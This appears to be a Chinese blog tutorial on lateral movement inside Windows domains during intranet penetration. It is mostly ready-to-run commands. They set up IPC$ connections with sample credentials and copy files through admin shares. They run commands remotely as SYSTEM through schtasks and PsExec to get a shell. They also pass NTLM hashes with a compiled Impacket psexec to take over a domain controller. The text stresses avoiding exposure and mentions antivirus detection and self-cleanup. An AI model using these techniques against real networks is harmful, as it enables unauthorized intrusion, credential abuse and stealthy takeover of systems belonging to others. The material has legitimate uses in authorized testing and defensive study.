在内网渗透时,如果登录远程桌面,容易暴露自己,所以还是尽可能使用命令行操作比较好
建立ipc连接
例:net use \\192.168.83.10 /u:TEST\Administrator Iamtest123
net use \\[ip] /u:[域名][用户] [密码]
net use 查看建立的ipc连接
net use \\192.168.83.10 /de /y 删除ipc连接
net view \\192.168.83.10 查看共享了哪些磁盘
dir \\192.168.83.10\c$\ 查看c盘目录
copy xxxx \\192.168.83.2\c$\ 上传文件到c盘
copy \\192.168.83.2\c$\xxx c:\ 下载文件到c盘
利用schtasks计划任务执行命令(不需要先创立ipc连接)
创建计划任务
schtasks /create /tn 任务名 /U 域\域用户 /P 域用户密码 /tr 执行的命令或bat路径 /sc ONSTART /s 域机子IP /RU system执行计划任务
schtasks /run /tn 任务名 /s 域机子IP /U 域\域用户 /P 域用户密码删除计划任务
schtasks /F /delete /tn 任务名 /s 域机子IP /U 域\域用户 /P 域用户密码
PsExec
下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
https://github.com/Al1ex/smbexec/releases
首先需要创建ipc连接
执行命令PsExec.exe \\192.168.83.10 -s cmd.exe -accepteula,然后等待一段时间,弹回shell
hash传递
另外我上篇抓取密码的文章中提到可以抓取密码的hash,我们可以通过该工具实现NTLM hash的传递
下载地址:https://github.com/SecureAuthCorp/impacket
上面的psexec.exe是微软的,并没有hash传递的功能
将Impacket中examples目录下的psexec.py用pyinstaller编译一下(编译完后有概率会被杀掉),生成psexec.exe文件
上传到服务器,使用命令:psexec.exe -hashes :xxxxxxxxxxxxxx TEST/Administrator@192.168.83.10获得域控管理员的shell
退出还会清掉文件
不好的就是中文会乱码
Impacket套件参考文章:http://www.secwk.com/2019/10/13/10518/
网友评论